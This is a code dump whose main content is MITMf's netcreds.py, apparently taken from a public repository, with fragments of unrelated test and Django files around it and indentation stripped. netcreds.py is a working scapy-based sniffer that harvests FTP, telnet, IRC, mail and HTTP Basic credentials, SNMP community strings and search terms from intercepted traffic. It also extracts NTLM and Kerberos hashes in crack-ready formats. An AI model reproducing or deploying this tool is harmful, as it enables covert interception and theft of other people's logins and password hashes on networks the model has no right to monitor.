with temporary_file_path(cleanup=False, suffix='.dot') as dot_file:
scheduler.visualize_graph_to_file(dot_file)
raise ValueError('At least one root failed: {}. Visualized as {}'.format(throws, dot_file))
return list(state.value for _, state in returns)
def execute_expecting_one_result(self, scheduler, product, subject):
request = scheduler.execution_request([product], [subject])
returns, throws = scheduler.execute(request)
if throws:
_, state = throws[0]
raise state.exc
self.assertEqual(len(returns), 1)
_, state = returns[0]
return state
def execute_raising_throw(self, scheduler, product, subject):
resulting_value = self.execute_expecting_one_result(scheduler, product, subject)
self.assertTrue(type(resulting_value) is Throw)
raise resulting_value.exc
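# Typical mixin usage (a hedged sketch; my_rules, MyProduct and my_subject are
# hypothetical stand-ins for a real rule set):
#
#   import unittest
#
#   class MyEngineTest(unittest.TestCase, SchedulerTestBase):
#     def test_roundtrip(self):
#       scheduler = self.mk_scheduler(rules=my_rules)
#       result, = self.execute(scheduler, MyProduct, my_subject)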
| apache-2.0 |
sunpeak/MITMf | core/netcreds.py | 3 | 33934 | import logging
import binascii
import struct
import base64
import threading
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in str(e): pass  # 'in e' would raise TypeError on py2 exceptions
def start(self, interface, ip, pcap):
if pcap:
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 5,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
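# Shape sketch of the store the two functions above maintain (values invented):
#   pkt_frag_loads = {'10.0.0.5:51234': OrderedDict([('3052441212', 'GET /...')])}
# i.e. per source ip:port, the most recent ACK maps to the reassembled load.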
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
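# State sketch (illustrative values): a server banner ending in 'login:' seeds
# telnet_stream['10.0.0.9:51022'] = 'username ', the client's keystrokes are
# appended on later packets, and the first '\r'/'\n' flushes
# 'Telnet username: alice' through printer() and clears the entry.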
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
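# e.g. a standard IPv4 header has header_len == 5 (5 * 4 = 20 bytes), so
# d['data'] starts at offset 20 -- the transport-layer payload.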
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str.lower())  # lower both sides so uppercase needles like 'USER' match
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
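# Worked example (hedged, assuming the case-insensitive count fix above):
#   double_line_checker('USER a\r\nUSER b\r\n', 'USER')  ->  'USER b'
# Note the trailing '\r\n' is dropped because split('\r\n')[-2] excludes it.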
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the latest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use identical client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
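# Worked example (hedged):
#   parse_ftp('USER alice\r\n', '10.0.0.1:21')  ->  ['FTP User: alice']
# A destination port other than :21 appends the nonstandard-port warning too.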
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
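# Worked example (hedged): AUTH PLAIN creds are '\x00user\x00pass' base64d, so
#   mail_decode(src, dst, 'AGFsaWNlAHMzY3JldA==')
# prints 'Decoded:  alice s3cret' (the NUL separators become spaces).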
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the latest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']  # trailing spaces matter for the method+' ' check in parse_http_line
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
#if http_line != None:
# method, path = parse_http_line(http_line, http_methods)
# http_url_req = get_http_url(method, host, path, headers)
#if http_url_req != None:
#printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
#We dont need this cause its being taking care of by the proxy
#Print user/pwds
#if body != '':
# user_passwd = get_login_pass(body)
# if user_passwd != None:
# try:
# http_user = user_passwd[0].decode('utf8')
# http_pass = user_passwd[1].decode('utf8')
# # Set a limit on how long they can be prevent false+
# if len(http_user) > 75 or len(http_pass) > 75:
# return
# user_msg = 'HTTP username: %s' % http_user
# printer(src_ip_port, dst_ip_port, user_msg)
# pass_msg = 'HTTP password: %s' % http_pass
# printer(src_ip_port, dst_ip_port, pass_msg)
# except UnicodeDecodeError:
# pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
#if method == 'POST' and 'ocsp.' not in host:
# try:
# msg = 'POST load: %s' % body.encode('utf8')
# printer(src_ip_port, None, msg)
# except UnicodeDecodeError:
# pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some add sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
basic_auth_creds = base64.decodestring(basic_auth_b64)
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
# Incomprehensible list comprehension flattens list of headers
# that are each split at ': '
# http://stackoverflow.com/a/406296
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
# Make the header key (like "Content-Length") lowercase
for header in headers_dict:
headers[header.lower()] = headers_dict[header]
return headers
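# Worked example of the flattening above (hedged):
#   headers_to_dict(['Host: example.com', 'User-Agent: curl/7.50'])
#     ->  {'host': 'example.com', 'user-agent': 'curl/7.50'}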
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different from requests, e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
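# Worked example (hedged):
#   parse_http_line('GET /index.html HTTP/1.1', http_methods)
#     ->  ('GET', '/index.html')
# A response line like 'HTTP/1.1 200 OK' fails the method check -> (None, None).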
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
msg2 = header_val2[1]
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(ack, msg2)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
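# Output format sketch (hedged; every field value is invented):
#   NETNTLMv2: user::DOMAIN:<server challenge, 16 hex>:<NT proof, 32 hex>:<blob hex>
# which matches the netntlmv2 input layout expected by john/hashcat.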
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword',
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
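# Worked example (hedged):
#   get_login_pass('username=alice&password=s3cret')
#     ->  ('username=alice', 'password=s3cret')
# Note the regexes return the whole 'field=value' chunk, not just the value.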
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))
| gpl-3.0 |
beezee/GAE-Django-base-app | django/db/backends/postgresql/operations.py | 229 | 9420 | import re
from django.db.backends import BaseDatabaseOperations
